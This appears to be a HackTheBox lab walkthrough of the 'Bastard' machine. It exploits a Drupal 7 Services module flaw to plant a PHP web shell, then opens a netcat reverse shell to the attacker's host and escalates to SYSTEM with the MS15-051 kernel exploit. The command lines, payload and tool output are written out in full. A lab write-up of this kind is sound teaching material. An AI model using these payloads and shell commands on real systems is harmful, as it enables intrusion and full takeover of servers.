Machine IP — 10.10.10.9
Nmap
nmap -p- -sCV -A -v 10.10.10.9PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
After enumerating for while i get to see that drupal 7 is running on port 80 so lets search for some vulnerability which can lead us to getting a shell of information .
let’s scan drupal with droopscan
┌─[root@PREDATOR]─[~]droopscan scan drupal -u http://10.10.10.9[+] Themes found:
seven http://10.10.10.9/themes/seven/
garland http://10.10.10.9/themes/garland/
[+] Possible interesting urls found:
Default changelog file - http://10.10.10.9/CHANGELOG.txt
Default admin - http://10.10.10.9/user/login
[+] Possible version(s):
7.54
[+] Plugins found:
ctools http://10.10.10.9/sites/all/modules/ctools/
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/ctools/changelog.txt
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
http://10.10.10.9/sites/all/modules/ctools/API.txt
libraries http://10.10.10.9/sites/all/modules/libraries/
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/libraries/changelog.txt
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/libraries/README.txt
http://10.10.10.9/sites/all/modules/libraries/readme.txt
http://10.10.10.9/sites/all/modules/libraries/README.TXT
http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
services http://10.10.10.9/sites/all/modules/services/
http://10.10.10.9/sites/all/modules/services/README.txt
http://10.10.10.9/sites/all/modules/services/readme.txt
http://10.10.10.9/sites/all/modules/services/README.TXT
http://10.10.10.9/sites/all/modules/services/LICENSE.txt
image http://10.10.10.9/modules/image/
profile http://10.10.10.9/modules/profile/
php http://10.10.10.9/modules/php/
[+] Scan finished (0:40:53.627982 elapsed)
Using dirsearch
When we visit http://10.10.10.9/rest we get to see that
Services Endpoint "rest_endpoint" has been setup successfully.Now search for exploit for drupal 7
Here we get 41564.php to be useful, but we are going to modify the script
$url = ‘10.10.10.9’;
$endpoint_path = ‘/rest’;
$endpoint = ‘rest_endpoint’;$file = [
‘filename’ => ‘dixuSOspsOUU.php’,
‘data’ => ‘<?php echo system($_GET[“cmd”]); ?>’
];
So now let’s use this script
┌─[root@PREDATOR]─[~/predator/oscp/htb/bastard/files]
└──╼ #php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: 10.10.10.9/dixuSOspsOUU.php
Here we make a php file and from here we can access our cmd using [ ?cmd=] at the url so now first we can send nc.exe to our target so that we can get a reverse shell form it used below command to copy nc.exe to server
* start smb share at local system using and keep nc.exe in the directory you are starting smb share smbserver.py raj .* now call the nc.exe form web to get it usinghttp://10.10.10.9/dixuSOspsOUU.php?cmd=copy \\10.10.14.2\raj\nc.exe nc.exe
Now we are having nc.exe so let’s call for a shell
http://10.10.10.9/dixuSOspsOUU.php?cmd=nc.exe 10.10.14.2 443 -e cmd.exeAnd turn on your nc at port 443
nc -lvp 443
Here we got nt authority\iusr user now we can access user.txt
C:\Users\dimitris\Desktop>type user.txt
type user.txt
ba22fde1932d06eb76a163d312f921a2Now let’s begin with privilege escalation for getting system shell, used [windows-exploit-suggester.py] for getting exploit for windows which can help is privilege escalation to system
Used systeminfo and got some hint to kernel exploit
C:\Users\dimitris\Desktop>systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496–001–0001283–84782
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 28/9/2019, 10:49:30 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.525 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.534 MB
Virtual Memory: In Use: 561 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9So here i had also enumerated in some previous machine form them i found it common to use MS15–051 can get it here
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zipCopied the ms15–051 to target using smb server in the same way we copied nc.exe to target using
copy \\10.10.14.2\raj\ms15–051.exe ms15–051.exe
C:\inetpub\drupal-7.54>ms15–051.exe “whoami”
ms15–051.exe “whoami”
[#] ms15–051 fixed by zcgonvh
[!] process with pid: 1836 created.
==============================
nt authority\systemYup here we can see that instead of nc we can also use nc.exe and get reverse shell of system let’s try it
Let’s listen it with nc
Done , we got system 😌
